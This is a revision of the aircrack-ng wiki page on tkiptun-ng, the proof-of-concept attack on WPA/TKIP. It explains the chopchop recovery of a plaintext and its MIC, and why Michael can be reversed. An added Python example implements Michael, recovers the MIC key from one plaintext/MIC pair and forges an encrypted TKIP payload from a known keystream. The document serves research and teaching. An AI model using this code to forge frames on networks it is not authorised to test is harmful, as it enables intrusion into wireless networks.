tkiptun-ng: revision 2009/09/05 23:30 by mister_x (wiki-files.aircrack-ng.org became download.aircrack-ng.org/wiki-files), compared against revision 2009/03/05 23:06 by darkaudax (added complete example of working output). The text below is the newer revision.
===== Description =====

NOTE: This documentation is still under development. Please check back regularly for the latest updates. If you have any feedback on the documentation, please post your comments to the [[http://forum.aircrack-ng.org|Forum]].

**IMPORTANT NOTE:** The tkiptun-ng SVN version is not fully working. The final attack phase is not yet implemented. The other portions work with the ieee80211 drivers for the RT73 and RTL8187L chipsets. The madwifi-ng driver is definitely broken and is known to fail completely. tkiptun-ng may work with other drivers, but they have not been tested, so your mileage may vary.

Tkiptun-ng is a tool created by Martin Beck aka hirte, a member of the aircrack-ng team. It is able to inject a few frames into a WPA TKIP network that has QoS (802.11e/WMM) enabled. QoS matters because TKIP keeps a separate replay counter (TSC) for each QoS priority, which is what allows a modified frame captured on one priority to be re-sent on a little-used priority without being dropped as a replay. He worked with Erik Tews (who created the PTW attack) on a presentation for [[http://pacsec.jp/|PacSec 2008]]: "Gone in 900 Seconds, Some Crypto Issues with WPA".

Tkiptun-ng is the proof-of-concept implementation of the WPA/TKIP attack. The attack is described in the paper [[http://dl.aircrack-ng.org/breakingwepandwpa.pdf|Practical attacks against WEP and WPA]] by Martin Beck and Erik Tews, which covers advanced attacks on WEP and the first practical attack on WPA. An additional excellent reference explaining how tkiptun-ng does its magic is the ars technica article [[http://arstechnica.com/security/news/2008/11/wpa-cracked.ars/|Battered, but not broken: understanding the WPA crack]] by Glenn Fleishman.

Basically, tkiptun-ng starts by obtaining the plaintext of a small packet sent from the AP to a client together with its MIC (Message Integrity Check). This is done with a [[chopchoptheory|chopchop]]-type method: the packet is truncated by one byte, the missing byte is guessed, and the client's reaction tells the attacker whether the guess was right. Because TKIP's countermeasures treat two MIC failures within 60 seconds as an attack and force a rekey, the tool must wait roughly a minute between guesses, which is why the whole attack takes on the order of 12 to 15 minutes rather than seconds. Once the plaintext and MIC are known, the MICHAEL algorithm is reversed: Michael is not a one-way function, every step of its block function is invertible, so the key can be run backwards out of the final MIC state. This yields the MIC key used to protect packets sent from the AP to the client (TKIP uses a separate MIC key for each direction).

At this point, tkiptun-ng has recovered the MIC key and knows a keystream for access point to client communication. Subsequently, using the keystream saved in the XOR file, you can create new packets of up to that keystream's length and inject them. The creation and injection are done using the other aircrack-ng suite tools.

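The two steps above, recovering the Michael key from one plaintext/MIC pair and building a new TKIP payload from a known keystream, as an added worked example. This is not code from the tkiptun-ng page or from the aircrack-ng code base; it implements the TKIP Michael MIC from the 802.11 specification, its inverse, and the data || MIC || ICV layout that the per-packet keystream encrypts. The key, addresses, payload and keystream bytes in the demonstration are constructed for illustration and are not real captured values.

```python
import struct
import zlib

MASK32 = 0xFFFFFFFF


def rol32(v, n):
    return ((v << n) | (v >> (32 - n))) & MASK32


def ror32(v, n):
    return ((v >> n) | (v << (32 - n))) & MASK32


def xswap(v):
    # Michael's XSWAP: swap the two bytes inside each 16-bit half of the word
    return ((v & 0xFF00FF00) >> 8) | ((v & 0x00FF00FF) << 8)


def michael_block(l, r):
    # The Michael block function b(L, R) as specified for TKIP.
    r ^= rol32(l, 17)
    l = (l + r) & MASK32
    r ^= xswap(l)
    l = (l + r) & MASK32
    r ^= rol32(l, 3)
    l = (l + r) & MASK32
    r ^= ror32(l, 2)
    l = (l + r) & MASK32
    return l, r


def michael_block_inv(l, r):
    # Every step of b() is a rotate, XOR or modular add, all invertible:
    # undo them in reverse order. This is what makes the MIC key recoverable.
    l = (l - r) & MASK32
    r ^= ror32(l, 2)
    l = (l - r) & MASK32
    r ^= rol32(l, 3)
    l = (l - r) & MASK32
    r ^= xswap(l)
    l = (l - r) & MASK32
    r ^= rol32(l, 17)
    return l, r


def michael_pad(msg):
    # Append 0x5a and then 4 to 7 zero bytes so the length is a multiple of 4.
    padded = msg + b"\x5a" + b"\x00" * 4
    return padded + b"\x00" * (-len(padded) % 4)


def michael(key, msg):
    # Michael MIC: 64-bit key as two little-endian words, message as LE words.
    l, r = struct.unpack("<II", key)
    for (word,) in struct.iter_unpack("<I", michael_pad(msg)):
        l ^= word
        l, r = michael_block(l, r)
    return struct.pack("<II", l, r)


def michael_recover_key(msg, mic):
    # Given one plaintext and its MIC, run Michael backwards to the key.
    l, r = struct.unpack("<II", mic)
    words = [w for (w,) in struct.iter_unpack("<I", michael_pad(msg))]
    for word in reversed(words):
        l, r = michael_block_inv(l, r)
        l ^= word
    return struct.pack("<II", l, r)


def tkip_mic_input(da, sa, priority, data):
    # TKIP computes Michael over DA || SA || priority || 3 zero bytes || MSDU.
    return da + sa + bytes([priority, 0, 0, 0]) + data


def forge_tkip_payload(keystream, mic_key, da, sa, priority, data):
    # RC4 encrypts data || MIC || ICV. With the keystream for one TSC known,
    # a new frame is just that plaintext XOR keystream; the TK is not needed.
    mic = michael(mic_key, tkip_mic_input(da, sa, priority, data))
    icv = struct.pack("<I", zlib.crc32(data + mic) & MASK32)
    plain = data + mic + icv
    if len(keystream) < len(plain):
        raise ValueError("keystream shorter than the frame to forge")
    return bytes(p ^ k for p, k in zip(plain, keystream))


if __name__ == "__main__":
    # Constructed values: a hypothetical AP->STA MIC key, addresses and an ARP-sized payload.
    mic_key = bytes.fromhex("0123456789abcdef")
    da, sa = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
    data = b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + b"\x00" * 28
    # After chopchop the attacker holds the plaintext and its MIC ...
    mic = michael(mic_key, tkip_mic_input(da, sa, 0, data))
    # ... and reverses Michael to get the key back.
    print("recovered MIC key:", michael_recover_key(tkip_mic_input(da, sa, 0, data), mic).hex())
    # Constructed keystream standing in for the bytes of a .xor file.
    keystream = bytes((i * 37 + 11) & 0xFF for i in range(64))
    print("forged frame:", forge_tkip_payload(keystream, mic_key, da, sa, 0, b"hello").hex())
```

The published Michael test vector (all-zero key, empty message, MIC 82925c1ca1d130b8) checks the forward direction; feeding that MIC and the same empty message into michael_recover_key returns the all-zero key, which is exactly the step tkiptun-ng performs once chopchop has exposed a plaintext and its MIC. Note that a forged frame is limited to the length of the known keystream and can only go in the direction (AP to client) whose MIC key was recovered.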
[[http://download.aircrack-ng.org/wiki-files/doc/tkip_master.pdf|Cryptanalysis of IEEE 802.11i TKIP]] by Finn Michael Halvorsen and Olav Haugen, June 2009, provides an excellent detailed description of how tkiptun-ng works. Their paper also includes detailed descriptions of many other attacks against WEP/WPA/WPA2.

Please remember this is an extremely advanced attack. You need advanced Linux and aircrack-ng skills to use this tool. DO NOT EXPECT support unless you can demonstrate you have these skills. Novices will NOT BE SUPPORTED.